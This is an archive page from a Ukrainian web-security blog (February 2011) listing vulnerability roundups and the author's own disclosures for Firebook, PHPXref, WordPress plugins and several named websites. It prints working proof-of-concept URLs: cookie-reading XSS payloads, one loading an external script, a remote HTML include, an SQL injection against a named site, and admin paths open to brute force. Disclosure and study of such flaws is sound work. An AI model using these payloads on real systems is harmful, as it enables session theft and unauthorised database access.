Архів для категорії 'Уразливості'

Добірка уразливостей

14:19 11.02.2011

В даній добірці уразливості в веб додатках:

  • SFCB vulnerabilities (деталі)
  • XSS in Squirrelmail plugin ‘Virtual Keyboard’ <= 0.9.1 (деталі)
  • XSS vulnerability in Docebo (деталі)
  • RSA Key Manager SQL injection Vulnerability (деталі)
  • XSS vulnerability in Expression CMS (деталі)
  • XSS vulnerability in Lantern CMS (деталі)
  • Core FTP mini-sftp-server Several DoS and Directory Traversal Vulnerabilities (деталі)
  • Core FTP Server(SFTP module) ‘open’ and ’stat’ Commands Remote Denial of Service Vulnerability (деталі)
  • XSS vulnerability in Lantern CMS (деталі)
  • Joomla! 1.5.20 <= Cross Site Scripting (XSS) Vulnerability (деталі)

Численні уразливості в Firebook

16:00 10.02.2011

27.11.2010

У травні, 24.05.2010, а також додатково 25.11.2010, я знайшов Information Leakage, Brute Force та Cross-Site Scripting уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на різних сайтах, в тому числі на офіційному сайті firebook.ru. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Firebook.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

10.02.2011

Information Leakage:

http://site/cgi-bin/firebook/firebook.cgi

На сторінці є розділ SystemInfo з Full path disclosure та іменами txt-файлів БД веб додатку.

Brute Force:

http://site/path_to_firebook_admin/ (скрита адмінка)

http://site/admin/index.html?account=in (публічна адмінка)

XSS:

http://site/path_to_firebook_admin/?Name=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Word=1&PutWord=1 (скрита адмінка)
http://site/admin/index.html?NAME=%3Cscript%3Ealert(document.cookie)%3C/script%3E&PASS=1&action=AccountIn (публічна адмінка)

Уразливі Firebook 3.100328 та попередні версії.

Уразливості в плагінах для WordPress №29

23:51 09.02.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Conduit Banner, BezahlCode-Generator та WordPress Audio. Для котрих з’явилися експлоіти. Conduit Banner - це плагін для розміщення Conduit банерів, BezahlCode-Generator - це плагін для створення віджета, що генерує коди для оплати, WordPress Audio - це плагін для роміщення аудіо на сайті.

  • WordPress Conduit Banner 0.2 Cross Site Scripting (деталі)
  • WordPress BezahlCode-Generator 1.0 Cross Site Scripting (деталі)
  • WordPress Audio 0.5.1 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості на lookmy.info

15:13 09.02.2011

28.06.2010

У листопаді, 20.11.2009, я знайшов Full path disclosure, Cross-Site Scripting та SQL Injection уразливості на проекті http://lookmy.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.02.2011

Full path disclosure:

http://lookmy.info/portal/modules.php?name=Ads

XSS:

http://lookmy.info/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection:

http://site.lookmy.info/print.php?id=1&pid=-1%20or%201=1

Дані уразливості вже виправлені. Але зазначу, що хоча XSS виправлена, але не якісно, тому при виключених mq на сайті (це потрібно для використання лапок) можна провести XSS атаку (для виконання коду або редирекції на інші сайти), зокрема з використанням MouseOverJacking.

Уразливості в PHPXref

17:33 08.02.2011

27.12.2010

У вересні, 19.09.2010, я знайшов Cross-Site Scripting та Remote HTML Include уразливості в PHPXref. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.

08.02.2011

XSS (RXI):

http://site/nav.html?javascript:alert(document.cookie)

RHI:

http://site/nav.html?http://websecurity.com.ua

Уразливі PHPXref 0.7 та попередні версії. У версії PHPXref 0.7.1 розробник виправив дані уразливості.

Уразливості на www.vrschange.com

15:08 07.02.2011

24.06.2010

У листопаді, 20.11.2009, я знайшов Insufficient Anti-automation та Brute Force уразливості на проекті http://www.vrschange.com, що також доступний за адресою http://www.vrsmoney.kiev.ua (обмінник веб грошей). Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно обмінників веб грошей я писав про уразливості на n-change.net.

Детальна інформація про уразливості з’явиться пізніше.

07.02.2011

Insufficient Anti-automation:

http://www.vrschange.com/guestbook/
http://www.vrsmoney.kiev.ua/guestbook/

Використовувалася уразлива капча.

Brute Force:

http://www.vrschange.com/guestbook/admin/
http://www.vrsmoney.kiev.ua/guestbook/admin/

За рахунок зміни движка (а також проект змінив домен на http://xobmen.com) дані уразливості вже виправлені.

Уразливості на chr.com.ua

15:09 05.02.2011

21.06.2010

У листопаді, 20.11.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://chr.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Зазначу, що уразливість має місце в локальному пошуковці, що використовує технологію Google. Про уразливості в локальних пошуковцях я вже писав раніше та наводив чимало прикладів сайтів з дірками в пошуку по сайту (в тому числі тих, що використовують локальні пошукові движки), як і чимало писав про дірки в пошукових системах.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

05.02.2011

XSS:

Це DOM Based XSS.

Insufficeint Anti-automation:

http://chr.com.ua/register/
http://chr.com.ua/lostpasswd/

На даних сторінках немає захисту від автоматизованих запитів (капчі).

Дані уразливості досі не виправлені.

Уразливості в плагінах для WordPress №28

23:57 04.02.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Featured Content, FCChat Widget та WordPress Uploader. Для котрих з’явилися експлоіти. Featured Content - це плагін для створення вибранного контенту, FCChat Widget - це плагін для створення чата, WordPress Uploader - це плагін для завантаження файлів.

  • WordPress Featured Content 0.0.1 Cross Site Scripting (деталі)
  • WordPress FCChat Widget 2.1.7 Cross Site Scripting (деталі)
  • WordPress Uploader 1.0.0 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:06 04.02.2011

В даній добірці уразливості в веб додатках:

  • Wing FTP Server - Cross Site Scripting Vulnerability (деталі)
  • Vulnerabilities in mailman (деталі)
  • Novell ZENworks Configuration Management Preboot Service Remote Code Execution Vulnerability (деталі)
  • XSS vulnerability in Elxis CMS polls module (деталі)
  • XSS vulnerability in Elxis CMS (деталі)
  • HP StorageWorks Storage Mirroring, Remote Unauthorized Access (деталі)
  • XSS vulnerability in Elxis CMS (contacts) (деталі)
  • XSS vulnerability in Docebo Announcements (деталі)
  • SQL injection vulnerability in Elxis CMS (деталі)
  • HP ServiceCenter Running on AIX, HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS) (деталі)

Нові уразливості в Firebook

15:11 03.02.2011

25.11.2010

У травні, 24.05.2010, я знайшов Insufficient Anti-automation, Abuse of Functionality, Information Leakage та Cross-Site Scripting уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на офіційному сайті firebook.ru. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в Firebook.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

03.02.2011

Insufficient Anti-automation:

http://site/index.html?mailto=MG1112008878;file=path/to/guestbook/message.html;

На сторінці відправки повідомлення на емайл немає захисту від автоматизованих запитів (капчі). При заході на сторінку перевіряється реферер.

Abuse of Functionality:

При відправці повідомлення в формі відправки на емайл, воно посилається не тільки власнику емайла, що розмістив повідомлення на сайті, але й на вказаний емайл відправника. Що може використовуватися для розсилки спама на довільні емайли.

Information Leakage:

http://site/env/index.html

Витік повного шляху на сервері та іншої інформації.

XSS:

http://site/env/index.html?%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі Firebook 3.100328 та попередні версії.